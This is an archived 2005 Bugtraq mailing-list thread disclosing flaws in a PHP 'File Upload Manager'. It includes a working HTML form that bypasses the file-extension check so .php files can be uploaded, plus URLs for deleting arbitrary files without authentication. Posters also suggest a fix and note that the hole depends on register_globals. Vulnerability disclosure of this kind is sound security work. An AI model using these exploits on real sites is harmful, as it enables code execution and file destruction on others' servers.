[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: File Upload Manager Sploits
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: File Upload Manager Sploits
- From: <systemcracker@xxxxxxxxx>
- Date: Wed, 15 Jun 2005 16:35:05 +0100
Also, I think this hole only occurs when register_globals is ON. In
the latest version of PHP, this defaults to OFF.
I've alerted the developers to this bug.
> On 6/15/05, systemcracker@xxxxxxxxx <systemcracker@xxxxxxxxx> wrote:
> > after some digging on google, I've found that this refers to the "File
> > Upload Manager" at
> > http://www.mtnpeak.net/webdev/index.php?pg=php
> > rather than any number of other File Upload Managers. It's a common
> > name, please include a url or at least vendor name in future.
> >
> > On 12 Jun 2005 22:22:45 -0000, blackshoe@xxxxxxxxx <blackshoe@xxxxxxxxx>
> > wrote:
> > > Below is some code for a recent unpatched exploit for file managers using
> > > php as the base code. Share this with the world and help protect.
> > >
> > > File Upload Manager - Bypass File Extension and Arbitrary File Delete
> > > nothing to see here @ hackthissite.org
> > >
> > > Through an input validation flaw, users are able to upload files that are
> > > not on the approve extension list. This can potentially allow users to
> > > upload .php files and gain permissions of the web server to execute
> > > commands and scripts.
> > >
> > > The code that checks for invalid file extensions makes use of an
> > > uninitialized variable which you can inject values into:
> > >
> > > for($i=0;$i<count($file_ext_allow);$i++)
> > > {
> > > if
> > > (getlast($fileupload_name)!=$file_ext_allow[$i])
> > > $test.="~~";
> > > }
> > > $exp=explode("~~",$test);
> > >
> > > if (count($exp)==(count($file_ext_allow)+1))
> > > { // (do not upload) } else { // (upload) }
> > >
> > > With each mismatch, they add '~~' to the variable 'test' and then compare
> > > it to the count of the original valid file extensions array.
> > >
> > > Users can create an html form with an extra form variable 'test' with the
> > > value of '~~~~~~' which will allow you to bypass the extension validation:
> > >
> > > <form method="post" enctype="multipart/form-data"
> > > action="http://www.asdf.com/url/to/fileuploader/index.php">
> > > file: <input type="file" name="fileupload" class="textfield" size="30">
> > > exxploitz: <input type="text" name="test" class="textfield" size="46"
> > > value="~~~~~~">
> > > <input type="submit" value="upload" class="button">
> > > </form>
> > >
> > > Fix: Use php's in_array() function to check to see if an extension is in
> > > the valid list.
> > >
> > >
> > > In an unrelated flaw, users are able to delete arbitrary files on the
> > > webserver by not checking authentication before passing it to delete
> > > functions.
> > >
> > > url to view a file: /index.php?act=view&file=d2VlLnBocC50eHQ=
> > > url to delete the same file: /index.php?act=del&file=d2VlLnBocC50eHQ=
> > >
> > > to choose what file to delete, just do base64_encode("filename");
> > >
> >
> >
> > --
> > Computing tools, PHP code, online tools and more at
> > http://www.puremango.co.uk
> >
>
>
> --
> Computing tools, PHP code, online tools and more at http://www.puremango.co.uk
>
--
Computing tools, PHP code, online tools and more at http://www.puremango.co.uk